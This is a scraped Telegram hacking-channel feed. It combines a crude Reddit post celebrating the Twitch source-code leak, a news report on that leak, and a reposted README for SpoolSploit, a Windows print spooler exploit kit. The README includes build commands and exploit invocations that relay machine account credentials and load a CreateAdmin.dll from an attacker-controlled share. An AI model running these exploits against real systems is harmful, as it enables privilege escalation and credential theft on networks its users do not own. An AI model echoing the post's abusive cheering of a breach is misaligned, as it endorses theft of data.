Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Feeling cute might delete later. And I'm happy Twitch got pwned, -

- skinned alive, and had their carcass of source code driven through the streets...

​you can claim credit at Bugcrowd which will contribute toward your position on Bugcrowd’s global leaderboard.

^ is the 'disclosure policy'(?) for what is presumed to be a 15 billion company. What a joke. Even though this looked ideological - if you offer zero motivation for disclosure by refusing to reward (proportional to the company revenue/severity of the vulnerability) individuals, I will cheer as you have to eat where you shit. If you are a company that rakes in billions a year, people don't want a 'pat on the back' for dumping your data.

Kindly eat a dick Twitch.



src: https://qz.com/1966986/twitch-owned-by-amazon-is-the-dominant-force-in-live-streaming/

submitted by /u/heap-spray-n-pray
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Twitch source code and creator payouts part of massive leak

https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Twitch source code and creator payouts part of massive leakPost Views: 103
Reading Time: 1 Minute
Twitch appears to have been hacked, leaking source code for the company’s streaming service, an unreleased Steam competitor from Amazon Game Studios, and details of creator payouts.
An anonymous poster on the 4chan messaging board has released a 125GB torrent, which they claim includes the entirety of Twitch and its commit history.

The poster claims the leak is designed to “foster more disruption and competition in the online video streaming space.” The Verge is able to confirm that the leak is legitimate, and includes code that is as recent as this week. Video Games Chronicle first reported details on the leak earlier today. Twitch has confirmed it has suffered a data breach, and the company says it’s “working with urgency to understand the extent of this.”
See Also: Complete Offensive Security and Ethical Hacking Course The leak includes the following:

* 3 years worth of details regarding creator payouts on Twitch.
* The entirety of twitch.tv, “with commit history going back to its early beginnings.”
* Source code for the mobile, desktop, and video game console Twitch clients.
* Code related to proprietary SDKs and internal AWS services used by Twitch.
* An unreleased Steam competitor from Amazon Game Studios.
* Data on other Twitch properties like IGDB and CurseForge.
* Twitch’s internal security tools.

The leak is labelled as “part one,” suggesting there could be more to come. Video Games Chronicle reports that Twitch is aware of the breach, but the company has not yet informed its userbase.
See Also: Apple Pay with VISA lets hackers force payments on locked iPhones The leak doesn’t appear to include password or address information on Twitch users, but that doesn’t mean this information hasn’t been obtained as part of this breach. In fact, the leaker seems to have focused on sharing Twitch’s own company tools and information, rather than code that would include personal accounts.

While Twitch has confirmed a data breach, it’s still unclear exactly how much data has been stolen. We’d recommend changing your Twitch password and enabling two-factor authentication on your account if you haven’t done so already.
See Also: Offensive Security Tool: URL Hunter Twitch has been struggling to contain ongoing hate and harassment recently. After weeks of hate raids, some Twitch streamers took a day off in August to protest against the company’s lack of action. Twitch has responded to the #DoBetterTwitch movement, and it’s a hashtag that the anonymous poster has used today to promote this leak.

Update, 7:35AM ET: The Verge can confirm leak is legitimate, and we have included more details on the data within the leak.

Update, 11:25AM ET: Twitch has now confirmed it has suffered a data breach.
See Also: Hacking stories – Operation Aurora: When China hacked Google Source: www.theverge.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/10/Apache-web-server-90x90.png Apache fixes actively exploited zero-day vulnerability, patch now1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/10/security-breach-freepik-90x90.jpg Encrypted & Fileless Malware Sees Big Growth2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/10/Digital-Wallet-90x90.jpg MFA Glitch Leads to 6K+ Coinbase Customers Getting Robbed3 days ago
* https://www.blackhatethicalhacking.com/wp-content/u[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Twitch source code and creator payouts part of massive leak https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Twitch source code and creator payouts part of massive leakPost Views: 103 Reading…
ploads/2021/10/shutterstock_1156765921-900x506-1-90x90.jpg Google pushes emergency Chrome update to fix two zero-days6 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/ezgif.com-gif-maker-2-90x90.jpg Apple Pay with VISA lets hackers force payments on locked iPhones1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/gamma-finfisher-hacked-tool-90x90.jpg FinFisher malware hijacks Windows Boot Manager with UEFI bootkit1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/computer-3923644_1920_1627303851339_1632808464296-90x90.jpg New malware steals Steam, Epic Games Store, and EA Origin accounts1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/VMware-90x90.jpg Hackers exploiting critical VMware vCenter CVE-2021-22005 bug1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/malware-800x449-1-90x90.jpg Malware devs trick Windows validation with malformed certs2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/ezgif.com-gif-maker-1-1-90x90.jpg Unpatched Apple Zero-Day in macOS Finder Allows Code Execution2 weeks ago
The post Twitch source code and creator payouts part of massive leak first appeared on Black Hat Ethical Hacking.

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Swimlane Releases Low-Code Security Automation Platform

Swimlane Cloud is a low-code software-as-a-service that allows anyone in the organization to create security automation tasks and automation.
Bugédex: My first step into cybersecurity!

If something had been ‘bugging’ you this weekend you couldn’t ‘catch’ a hold of, then you should have been at Bugédex! This fantastic…Continue reading on Medium »
Read more...
A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.
Summary
SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials (https://www.kitploit.com/search/label/Credentials) to escalate privileges and execute malicious DLLs on endpoints (https://www.kitploit.com/search/label/Endpoints) with full system access. 

___________________________
@hacking_Attack
@Hacking_Video
Getting Started
As of the release date the SpoolSploit Docker container (https://www.kitploit.com/search/label/Container) has been tested successfully on the latest versions of MacOS, Ubuntu Linux, and Windows 10.Although not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a virtual machine (https://www.kitploit.com/search/label/Virtual%20Machine) that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.
Create and access the SpoolSploit Docker container
Clone this repositorygit clone https://github.com/BeetleChunks/SpoolSploit
Build the SpoolSploit Docker container imagecd SpoolSploit
sudo docker build -t spoolsploit .
Create and start the SpoolSploit Docker containersudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
Attach to the containersudo docker exec -it spoolsploit /bin/bash

Command-line Usage
) -rP {139,445}, --rport {139,445} Remote SMB server port. -lH LHOST, --lhost LHOST Listening hostname or IP -lS LSHARE, --lshare LSHARE Staging SMB share (UNC) -d DOMAIN, --domain DOMAIN Domain for authentication -u USER, --username USER Username for authentication -p PASSWD, --password PASSWD Password for authentication Example - spoolsample: python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 Example - nightmare: python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 ">usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:
-h, --help show this help message and exit
-a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
Attack type to execute on target(s).
-rH RHOST, --rhost RHOST
Remote target IP, CIDR range, or filename (file:)
-rP {139,445}, --rport {139,445}
Remote SMB server port.
-lH LHOST, --lhost LHOST
Listening hostname or IP
-lS LSHARE, --lshare LSHARE
Staging SMB share (UNC)
-d DOMAIN, --domain DOMAIN
Domain for authentication
-u USER, --username USER
Username for authentication
-p PASSWD, --password PASSWD
Password for authentication

Example - spoolsample:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

Example - nightmare:
python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

SpoolSample - Capture and relay Windows machine account credentials
The SpoolSploit Docker container includes Responder (https://github.com/lgandx/Responder) for relaying machine account hashes obtained from executing the spoolsample attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.

___________________________
@hacking_Attack
@Hacking_Video